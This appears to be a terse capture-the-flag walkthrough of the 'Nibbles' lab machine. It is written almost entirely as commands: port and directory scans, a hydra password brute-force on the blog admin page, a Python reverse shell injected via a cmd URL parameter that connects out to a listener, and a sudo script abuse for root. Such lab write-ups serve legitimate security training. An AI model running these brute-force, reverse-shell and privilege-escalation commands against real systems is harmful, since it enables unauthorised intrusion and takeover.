echo "10.129.87.224 nibbles.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.87.224 --min-rate=10000 --script=vuln --script-timeout=15 -v nmap -T4 -oA output 10.129.87.224 --script=vuln -v nmap -sT -sV -sC -Pn -p- 10.129.87.224

Pasted image 20210304221529.png

Pasted image 20210304221536.png

gobuster dir -u http://10.129.87.224/nibbleblog/ -w /usr/share/SecLists/Discovery/Web-Content/Common-PHP-Filenames.txt -t 20

Pasted image 20210304221819.png

nikto -h 10.129.87.224:80

Pasted image 20210304221840.png

Pasted image 20210304221846.png

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.129.87.224 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

Pasted image 20210304221944.png

https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html

/usr/share/laudanum/wordpress/templates/php-reverse-shell.php

Pasted image 20210304221959.png

Pasted image 20210304222005.png

http://10.129.87.224/nibbleblog/content/private/plugins/my_image/image.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.%20SOCK_STREAM);s.connect((%2210.10.14.164%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

rlwrap nc -lvnp 5555 http://10.129.87.224/nibbleblog/content/private/plugins/my_image/image.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.%20SOCK_STREAM);s.connect((%2210.10.14.164%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

rlwrap nc -lvnp 5555

Pasted image 20210304222051.png

Pasted image 20210304222058.png

nibbler@Nibbles:/$ cd /home/nibbler nibbler@Nibbles:/home/nibbler$ mkdir -p personal/stuff nibbler@Nibbles:/home/nibbler$ echo "/bin/bash" > personal/stuff/monitor.sh nibbler@Nibbles:/home/nibbler$ chmod a=rwx personal/stuff/monitor.sh nibbler@Nibbles:/home/nibbler$ sudo /home/nibbler/personal/stuff/monitor.sh root@Nibbles:/home/nibbler# whoami

Pasted image 20210304222115.png

boxes

copyright©2022 Cu3rv0x all rights reserved